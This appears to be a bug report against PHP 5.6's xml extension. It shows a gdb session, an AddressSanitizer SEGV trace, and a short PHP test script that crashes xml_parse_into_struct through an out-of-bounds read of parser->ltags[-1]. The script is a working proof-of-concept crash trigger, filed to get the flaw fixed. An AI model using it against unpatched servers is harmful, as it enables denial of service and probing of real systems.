Description: ------------ Run test script with PHP/ASAN. I'm marking it as security since parsing xml coming from user is a common task, so apologies in advance if it's not security relevant. (gdb) b xml.c:992 Breakpoint 1 at 0x83a3ae5: file /home/fmunozs/phpgit/php56dbg/ext/xml/xml.c, line 992. (gdb) r Breakpoint 1, _xml_characterDataHandler (userData=0xb5f5bba4, s=0x8d185e5 "aaaaaaaaaa", len=10) at /home/fmunozs/phpgit/php56dbg/ext/xml/xml.c:992 992 _xml_add_to_info(parser,parser->ltags[parser->level-1] + parser->toffset); (gdb) print parser $1 = (xml_parser *) 0xb5f5bba4 (gdb) print parser->ltags $2 = (char **) 0xb5f5c894 (gdb) print parser->ltags[parser->level-1] $3 = 0x5c7efff0 <error: Cannot access memory at address 0x5c7efff0> (gdb) print parser->ltags[parser->level] $4 = 0x0 (gdb) print parser->ltags $5 = (char **) 0xb5f5c894 (gdb) print parser->level $8 = 0 (gdb) print parser->ltags[parser->level-1] + parser->toffset $9 = 0x5c7efff0 <error: Cannot access memory at address 0x5c7efff0> parser->level is 0 and line 992 is trying to access -1 element. Test script: --------------- <?php $var1=xml_parser_create_ns(); $var2="<xss>"; xml_parse($var1, $var2); $var2=str_repeat("a", 10); $var3=[]; $var4=[]; xml_parse_into_struct($var1, $var2, $var3, $var4); var_dump($var3); Expected result: ---------------- No crash Actual result: -------------- ================================================================= ==4221==ERROR: AddressSanitizer: SEGV on unknown address 0x0000001d (pc 0xb6dc6256 bp 0xbfba8e18 sp 0xbfba89a4 T0) #0 0xb6dc6255 (/lib/i386-linux-gnu/libc.so.6+0x7c255) #1 0xb71e7655 in __interceptor_strlen (/usr/lib/i386-linux-gnu/libasan.so.2+0x6a655) #2 0x90e321f in _xml_add_to_info /home/fmunozs/phpgit/php56/ext/xml/xml.c:740 #3 0x90ef305 in _xml_characterDataHandler /home/fmunozs/phpgit/php56/ext/xml/xml.c:992 #4 0x90ff63b in _cdata_handler /home/fmunozs/phpgit/php56/ext/xml/compat.c:274 #5 0xb6f33ec4 in xmlParseCharData (/usr/lib/i386-linux-gnu/libxml2.so.2+0x34ec4) #6 0xb6f4461c (/usr/lib/i386-linux-gnu/libxml2.so.2+0x4561c) #7 0xb6f44f62 in xmlParseChunk (/usr/lib/i386-linux-gnu/libxml2.so.2+0x45f62) #8 0x9103efb in php_XML_Parse /home/fmunozs/phpgit/php56/ext/xml/compat.c:605 #9 0x90e0e8e in zif_xml_parse_into_struct /home/fmunozs/phpgit/php56/ext/xml/xml.c:1499 #10 0x9a7dbe8 in zend_do_fcall_common_helper_SPEC /home/fmunozs/phpgit/php56/Zend/zend_vm_execute.h:558 #11 0x96417e6 in execute_ex /home/fmunozs/phpgit/php56/Zend/zend_vm_execute.h:363 #12 0x9a6de98 in zend_execute /home/fmunozs/phpgit/php56/Zend/zend_vm_execute.h:388 #13 0x9472029 in zend_execute_scripts /home/fmunozs/phpgit/php56/Zend/zend.c:1341 #14 0x91ae13b in php_execute_script /home/fmunozs/phpgit/php56/main/main.c:2613 #15 0x9a8795a in do_cli /home/fmunozs/phpgit/php56/sapi/cli/php_cli.c:994 #16 0x808a502 in main /home/fmunozs/phpgit/php56/sapi/cli/php_cli.c:1378 #17 0xb6d62645 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x18645) #18 0x808aaba (/home/fmunozs/phpgit/php56/sapi/cli/php+0x808aaba) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV ??:0 ?? ==4221==ABORTING